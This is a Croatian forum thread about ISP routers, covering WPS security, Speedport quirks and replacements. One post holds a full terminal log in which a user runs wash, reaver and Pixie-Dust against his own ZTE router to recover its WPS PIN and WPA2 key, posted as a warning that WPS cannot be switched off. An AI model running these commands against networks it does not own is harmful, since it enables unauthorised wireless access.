|
19.12.2016., 17:05 | #1561 |
Moderator
Datum registracije: Sep 2006
Lokacija: St
Postovi: 22,647
|
Opće poznato da je WPS potencijalno sigurnosna rupa. Zbog toga se ugasi kao u primjeru kolege i problem riješen. |
20.12.2016., 09:58 | #1562 |
Registered User
Datum registracije: Mar 2016
Lokacija: Rijeka
Postovi: 39
|
Pogledao sam na net-u WPS parametar od routera: The flaw allows a remote attacker to recover the WPS PIN in a few hours with a brute-force attack and, with the WPS PIN, the network's WPA/WPA2 pre-shared key.[4] Users have been urged to turn off the WPS PIN feature,[5] although this may not be possible on some router models.[6] Što bi ovo trebalo značiti, trebamo li isključiti WF, ili imamo neko riješenje.. Zadnje izmijenjeno od: VKR77. 20.12.2016. u 10:05. |
20.12.2016., 15:00 | #1563 |
Premium
Datum registracije: Aug 2013
Lokacija: Zagreb
Postovi: 4,116
|
Metodom "brute-force attack" se moze probit vecina zastita. Stoga je u novom softveru doticnog routera WPS opcija spajanja pomocu PIN-a onemogucena. U starom softveru je omogucena, ali se moze iskljucit... |
20.12.2016., 16:15 | #1564 |
Torrent freek
Datum registracije: Mar 2005
Lokacija: Split
Postovi: 3,919
|
Koliko je meni poznato većina upada u router se i prakticira preko WPS, rijetko tko probija WPA enkripcije
__________________
|
20.12.2016., 16:33 | #1565 |
Premium
Datum registracije: Aug 2013
Lokacija: Zagreb
Postovi: 4,116
|
Zato se u novijim softverima WPS iskljucuje, ili kao u slucaju spomenutog routera onemogucava i sakriva se opcija za ukljucivanje. Moze se ona na tom routeru relativno jednostavno FireBug-om ukljucit, ali samo ako imas pristup html kodu, a to izvana nemas... |
21.12.2016., 12:04 | #1566 |
Registered User
Datum registracije: Dec 2016
Lokacija: Tunguzija
Postovi: 10
|
Zadnje izmijenjeno od: Stručnjak. 21.12.2016. u 12:13. |
21.12.2016., 12:09 | #1567 |
Registered User
Datum registracije: Dec 2016
Lokacija: Tunguzija
Postovi: 10
|
Ne znam je li to screenshot sa tvojeg ZTE routera ali ako je, imaš sreću jer na mojem routeru kojeg sam dobio prije mjesec dana, ne postoji postavka za isključenje WPS-a. Inače, router sa uključenim WPS-om se skreka za manje od 3 minute, bez obzira na kompleksnost passworda |
21.12.2016., 12:11 | #1568 |
Registered User
Datum registracije: Dec 2016
Lokacija: Tunguzija
Postovi: 10
|
Zadnje izmijenjeno od: Stručnjak. 21.12.2016. u 12:13. Razlog: ispravka |
21.12.2016., 13:00 | #1569 | |
Premium
Datum registracije: Aug 2013
Lokacija: Zagreb
Postovi: 4,116
|
Citiraj:
Kako znas da je na tvom ZTE routeru WPS stalno ukljucen? I ako je stalno ukljucen na kojoj opciji, jer ima ih vise za izabrat, je trenutno ukljucen? |
|
21.12.2016., 15:13 | #1570 |
Registered User
Datum registracije: Dec 2016
Lokacija: Tunguzija
Postovi: 10
|
Postoje hakerski alati koji skeniraju da li je WPS uključen ili isključen na određenom routeru. Jedan od njih je Wash==>https://www.youtube.com/watch?v=cD_Zyb8vVfM |
21.12.2016., 15:20 | #1571 |
Registered User
Datum registracije: Dec 2016
Lokacija: Tunguzija
Postovi: 10
|
|
21.12.2016., 16:22 | #1572 |
Torrent freek
Datum registracije: Mar 2005
Lokacija: Split
Postovi: 3,919
|
Stručnjače puno zujiš malo meda daješ, koristi EDIT tipku i čitaj postove prije nego odgovaraš na iste. Nigdje nisam napisao da je WPS enkripcija, dapače Inače daj SS tog routera kojem je WPS omogućen po defaultu i ne da se ugasit.
__________________
|
21.12.2016., 16:31 | #1573 |
amigo
Datum registracije: Dec 2007
Lokacija: VG
Postovi: 241
|
Strahovi od krekanja WPS-a na ovom ruteru su pomalo neosnovani. Noviji ruteri sami disableaju WPS ako se 3 puta ukuca krivi pin. Nakon nekog vremena se vrati ali ako se opet ukuca krivi pin vrijeme lockanja WPS-a se eksponencijalno produzuje. Na kraju sve postaje jako vremenski zahtjevno za napadača pa time i dosta neisplativo. |
21.12.2016., 21:12 | #1574 | |
Premium
Datum registracije: Aug 2013
Lokacija: Zagreb
Postovi: 4,116
|
Citiraj:
"I do all this and it shows me networks all "WPS locked" on all networks is "no", than i start hack network, and it take ages, so i quit, when i do "wash" again it shows me WPS locked - yes on network i was trying to hack... and it reapeats for every network... :/" Kako si netocno u svom prvom postu deklarirao sve ZTE routere kao nepopravljivo ranjive preko WPS-a i kako nisi sam isprobao ovu neuspjesnu metodu koju dajes za primjer ranjivosti, predlazem ti da svom nick-u dodas negativni predznak i prepustis brigu o WPS nesigurnosti pravim Strucnjacima |
|
22.12.2016., 11:12 | #1575 |
Registered User
Datum registracije: Dec 2016
Lokacija: Tunguzija
Postovi: 10
|
Ne mogu poslati SS jer nakon što tehničar nije mogao isključiti WPS pošto nije pronašao tu opciju, na moj zahtjev, dobio sam Speedport u zamjenu. Niže je protokol testiranja sigurnosti mojeg ZTE routera na WPS sa probijenim PIN-om i WPA2/AES passwordom (na dnu boldano). Naime, navedeni router sam dobio prije mjesec dana jer sam prešao na 100 Mbit optiku. Da ponovim, na navedenom routeru uz najnoviji firmware, nije moguće isključiti WPS. Na protokolu sam BSSID i ESSID zbog privatnosti zamijenio sa "x". Ako ti na svojem routeru imaš opciju isključenja WPS-a, ovaj post se ne odnosi na tebe već je upozorenje za sve koji su nedavno dobili ZTE. Znam samo da mi je susjed također dobio optiku i njegov WPS je također aktivan. ----------------------------------------------------------------------------------------------- root@kali:~# wash -i mon0 Wash v1.5.2 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner mod by t6_x BSSID Channel RSSI WPS Version WPS Locked ESSID --------------------------------------------------------------------------------------------------------------- xx:xx:xx:xx:xx:xx 2 -41 1.0 No xxxxxx ^C root@kali:~# reaver -c 2 -i mon0 -b xx:xx:xx:xx:xx:xx -vv -K 1 Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner mod by t6_x [+] Switching mon0 to channel 2 [+] Waiting for beacon from xx:xx:xx:xx:xx:xx [+] Associated with xx:xx:xx:xx:xx:xx (ESSID: xxxxxx) [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [+] Trying pin 12345670. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [P] E-Nonce: 7c:d1:48:e0:07:7a:1b:f6:2f:d0:56:e4:e7:ab:e3:a1 [P] PKE: c5:7a:18:62:dc:0f:2a:4c:82:b9:57:3f:e8:27:31:1b:eb:75:45:d6:c6:14:f4:eb:4f:b8:57:dd:1b:09:b1:6c:01:e8:7e:b1:86:a2:1c:66:e1:20:c7:16:86:b5:64:07:51:1 c:a8:ce:3f:76:f8:ff:b8:8a:bc:19:ff:85:58:6f:13:36:ff:59:41:a5:65:d2:2c:97:9a:71:36:7a:97:b9:e5:f3:58:2d:56:fc:16:65:87:75:fb:8c:32:36:86:19:1e:f6:e3:91:16: af:96:7e:68:2e:2f:9f:72:68:b1:f7:29:16:48:dd:4c:4e:28:0b:ee:b5:1b:45:b3:c8:d6:45:0f:7e:20:b3:34:73:23:79:72:0c:2f:68:e0:6c:87:a1:04:a2:55:61:50:f6:f4:84: 14:7b:52:82:9a:0b:27:06:76:ea:6b:b4:13:94:6a:6b:43:dd:3b:8f:44:34:e0:0e:ef:7d:fa:df:db:83:77:5a:d9:a3:02:44:c3:89:23:8c [P] WPS Manufacturer: ZTE [P] WPS Model Name: ZXHN H367N [P] WPS Model Number: V1.0 [P] Access Point Serial Number: 12345678 [+] Received M1 message [P] R-Nonce: 16:de:e8:fa:19:25:5f:13:3b:45:0d:75:ce:e9:e7:a7 [P] PKR: f6:97:17:9f:8a:d5:59:68:24:e9:f3:68:1a:18:80:4f:34:cc:b4:ab:a9:3f:31:d4:c3:c0:f0:f9:34:09:d8:d4:ed:92:d0:ff:53:22:3e:0f:6e:40:03:2d:bc:95:f9:8d:c6: 1a:b6:e5:1c:67:7f:8f:d9:f7:f4:02:20:84:b1:cc:6e:1c:00:04:31:7c:b9:4f:cb:82:11:28:4d:79:3a:80:c1:97:80:ee:ff:56:ce:24:5f:ba:6c:59:eb:07:44:c0:84:c0:7d:a8:f2: 1e:a5:14:f9:8c:52:80:a7:31:b5:62:4d:f6:b8:a0:85:0e:9f:3a:06:ca:58:e0:df:a3:f2:4a:44:c8:60:0f:4d:f6:28:7e:68:0d:af:81:82:bf:54:aa:23:97:4a:34:45:e7:a1:d2:27: 32:6c:4e:db:48:c4:d0:34:9e:35:01:9b:d9:2b:21:68:f5:ec:e8:d9:16:96:88:c4:d4:5e:a4:22:d1:7b:7a:ed:ad:69:d9:5d:05:fb:7b [P] AuthKey: 08:4f:c3:96:90:80:f4:c7:97:eb:85:5e:12:1f:78:5c:f8:90:d6:6f:34:73:fd:2c:d8:34:0b:d6:4a:29:6d:1e [+] Sending M2 message [P] E-Hash1: 8c:70:d6:c4:d3:45:47:6e:d4:fb:e9:1c:f3:fe:13:b4:4b:8c:35:e6:53:51:a4:4c:bc:e5:d0:d8:08:6d:f0:1b [P] E-Hash2: 88:50:c2:21:f3:a3:a0:f2:e1:29:97:31:8f:a9:09:6b:da:9b:85:15:b7:c8:c4:da:7f:f1:bd:45:34:a8:f5:f7 [Pixie-Dust] [Pixie-Dust] Pixiewps 1.2 [Pixie-Dust] [Pixie-Dust] [*] Mode: 1 (RT/MT) [Pixie-Dust] [*] PSK1: d0:d2:73:18:16:2d:d8:7f:ad:33:1d:8c:b0:8b:81:5b [Pixie-Dust] [*] PSK2: 7a:5c:51:90:20:54:0c:8e:d7:0c:d4:60:8c:56:fa:67 [Pixie-Dust] [*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [Pixie-Dust] [*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [Pixie-Dust] [+] WPS pin: 60273468 [Pixie-Dust] [Pixie-Dust] [*] Time taken: 0 s 97 ms [Pixie-Dust] Running reaver with the correct pin, wait ... Cmd : reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c 2 -s y -vv -p 60273468 [Reaver Test] BSSID: xx:xx:xx:xx:xx:xx [Reaver Test] Channel: 2 [Reaver Test] [+] WPS PIN: '60273468' [Reaver Test] [+] WPA PSK: '31qc8i4pgmcat6ht' [Reaver Test] [+] AP SSID: ‘xxxxxx’ root@kali:~#</t6_x@hotmail.com></che...@tacnetsol.com> Zadnje izmijenjeno od: Nikky. 22.12.2016. u 13:53. Razlog: Ne treba quote za post poviše |
24.12.2016., 20:37 | #1576 |
Registered User
Datum registracije: Dec 2016
Lokacija: Zagreb
Postovi: 7
|
Ljudi, evo baš na Badnjak danas sam dobio ovaj router :-) Donio mi ga dostavljač. Pretpostavljam zato jer sam jučer u petak popodne izrazio želju da se prebacim na Max3 paket. Imam sve usluge(tel.+maxadsl+maxtv) ali bez ugovorne obaveze, jučer navečer sam izrazio želju da bi se prebacio u paket i danas ujutro na Badnjak dostavljač mi donese ovu zvijer od Speedporta :-) Nevjerovatno mi je da su tak brzi :-) Valjda sam ga dobio zato jer mi je trenutna brzina već godinama 10 megabita(Thomson) pa bi ovaj valjda bio brži, ali to je više do centrale nego do routera. Inače, od centrale sam udaljen oko 800 metara, tak da mi nije jasno zašto već i ovaj Thomson nije mogao povuć više od 10. Sjećam se kad sam pred nekih dvije, tri godine, kad sam htio uzet veću brzinu dolazili tehničari, otvarali ormarić na fasadi, išli u obližnju centralu i na kraju su zaključili da uz max tv na mojoj parici i na toj centrali ne mogu imat veću brzinu od 10 mb/s. Valjda se sad stvar promijenila? Pojma nemam. Stvar se još komplicira jer su u mojoj ulici koja je kvart s obiteljskim kućama u Zagrebu, prije par mjeseci provodili neki kabel kroz kanalizaciju do ormarića na fasadi, radnici su rekli da je koaksijalni, to se vjerojatno radi o vipovom bnetu, međutim kad idem na provjeru pristupa na b.netu nemam mogućnost njihovih trio paketa. Danas sam na kraju stornirao taj moj zahtjev predan jučer za max3 paket jer mi je bolje uzet max2 paket a maxtv preko satelita. Tak mi više odgovara. Ali da li to uopće uzimat i obavezat se na 24 mjeseca na obadvoje ako postoji mogućnost da uskoro, za koji mjesec dobijem tcom optiku u ulici? Onda bi radije pričekao i uzeo ultra max optiku. Pojma nemam kaj da napravim sad, umjesto da kitim bor ja cjeli dan proučavam tcomove pakete i cjenike, uspoređujem cijene i pakete programa grrrr... :-) I još mi teče rok od 4 dana za vratit ovaj Thomson router tcomu jer inače ću morat platit neku naknadu, to piše u obavijesti koja je došla sa Speedportomdanas, da bi trebao dat dostavljaču koji mi je donio novi router, ovaj stari router, a dostavljač o tome nije niti zucnuo niti mi je itko u službi za korisnike rekao niti da će mi doć novi router a još manje da ovaj stari moram vratit. Zahvaljujem svakom tko pročita ovaj roman na Badnjak i udijeli neki savjet, bilo kaj.. :-) |
24.12.2016., 20:53 | #1577 |
Premium
Datum registracije: Aug 2006
Lokacija: Zagreb
Postovi: 469
|
|
25.12.2016., 01:36 | #1578 | |
Registered User
Datum registracije: Feb 2016
Lokacija: Kvatrić, Zagreb
Postovi: 104
|
Citiraj:
__________________
http://forum.pcekspert.com/faq.php |
|
25.12.2016., 12:54 | #1579 |
Registered User
Datum registracije: Dec 2016
Lokacija: Zagreb
Postovi: 7
|
|
25.12.2016., 13:00 | #1580 | |
Registered User
Datum registracije: Dec 2016
Lokacija: Zagreb
Postovi: 7
|
Citiraj:
|
|
25.12.2016., 22:00 | #1581 |
Registered User
Datum registracije: Dec 2016
Lokacija: Zagreb
Postovi: 7
|
Ovaj Speedport je stvarno bezveze u usporedbi sa mojim starim dobrim Thomsonom 782. Na Speedportu uopće ne mogu vidjet čak ni neke banalne stvarni npr. tko je sve trenutno povezan na router preko LAN-a i WLAN-a. Na Thomsonu mi uredno izlista sve konekcije, IP i MAC adrese, sve fino pregledno, doduše to je sa admin passom. Evo sad su 4 kompa spojena na Speedport (2 na LAN, 2 na WLAN) a router veli: 0 LAN connections 0 WLAN connections :-) Port forwarding nisam niti pokušavao podesit. Vratit ću se na Thomsona a Speedport ću vratit Tcomu pa kad i ako mi dođe optika, neka mi ga ponovo pošalju. Za brzinu do 20 mb/s Thomson bi trebao bit sasvim dovoljan Zadnje izmijenjeno od: tommo. 26.12.2016. u 01:48. |
25.12.2016., 23:49 | #1582 | |
Premium
Datum registracije: Aug 2006
Lokacija: Zagreb
Postovi: 469
|
Citiraj:
Dakle klikneš na home network pa onda tamo na "Overall of the devices in the home network" i pričekaš par sekundi da sve izlista... |
|
26.12.2016., 18:08 | #1583 |
Registered User
Datum registracije: Dec 2016
Lokacija: Zagreb
Postovi: 7
|
Evo, trenutno su mi spojena 2 desktopa prek LANa, laptop i smartphone prek wlana, svima je namještena fiksna ip adresa, DHCP sam isključio i u "Overall of the devices..." ja dobivam ovo na slici. Na Overview ekranu također 0 konekcija. Sa uključenim DHCP-om ista stvar. Na svim uređajima konekcija funkcionira i Internet normalno radi ali po ovome ispada da nema spojenih uređaja. Ne pada mi na pamet da idem sad manualno upisivat MAC adrese za svaki uređaj :-) Zadnje izmijenjeno od: tommo. 26.12.2016. u 18:23. |
26.12.2016., 19:12 | #1584 |
Moderator
Datum registracije: Sep 2006
Lokacija: St
Postovi: 22,647
|
Nemoj se niti truditi, opće poznato da je t-koma custom fw = smetje. |
26.12.2016., 23:12 | #1585 | |
Premium
Datum registracije: Aug 2006
Lokacija: Zagreb
Postovi: 469
|
Citiraj:
p.s. i naravno MAC adrese ne moraju biti upisane |
|
27.12.2016., 04:17 | #1586 |
Registered User
Datum registracije: Dec 2016
Lokacija: Zagreb
Postovi: 7
|
|
27.12.2016., 23:00 | #1587 |
Registered User
Datum registracije: May 2008
Lokacija: graškograd
Postovi: 2
|
Nemam vremena čitati više, pa da pitam... (došao sam do 14 stranice) Izgleda da crkava sx763, pa mi ponudili novi i pitali da biram između ovog speedport-a i zte zxdsl931 VII. Da li sve sada radi OK na speedport-u ili da uzmem ZTE? (GbE bi mi baš dobro sjeo; da li ga onemoguće ako sam na bakru, ADSL 10 Mbit/s) Što je s vraćanjem (ne stignem...) sx-a; dobio sam ga prije cca. 1 godine? Hvala! |
27.12.2016., 23:29 | #1588 |
Premium
Datum registracije: Dec 2015
Lokacija: Split
Postovi: 991
|
Ja ti se bas nekuzim, al ovaj mi bolje radi od zte. |
28.12.2016., 23:52 | #1589 |
Registered User
Datum registracije: May 2008
Lokacija: graškograd
Postovi: 2
|
Dobio sam speedport-a. (verzija 39) U odnosu na sx-a sve je bolje ili isto, osim što sam na torrentu morao smanjiti broj izlaznih konekcija na 4. (očito je modem na sx-u bolji; imam jako lošu paricu) Vanjski USB disk (NTFS) radi OK (oko 5Mb/s) ali nije baš za torrent disk jer brzina torrenta odmah padne na 500kB/s. |
30.12.2016., 11:43 | #1590 |
Registered User
Datum registracije: Aug 2016
Lokacija: Krapina
Postovi: 6
|
Pozdrav, imam problem sa širenjem wifi signala. Naime, za vrijeme starog modema od t-coma sve je radilo, a nakon njihove zamjene novim speedport 724v type ci, moj extender dlink dap 1360 više ne radi ili ga ja neznam više podesiti. Da li je možda potrebno podesiti nešto u samome speedportu? Zahvaljujem. |
|
|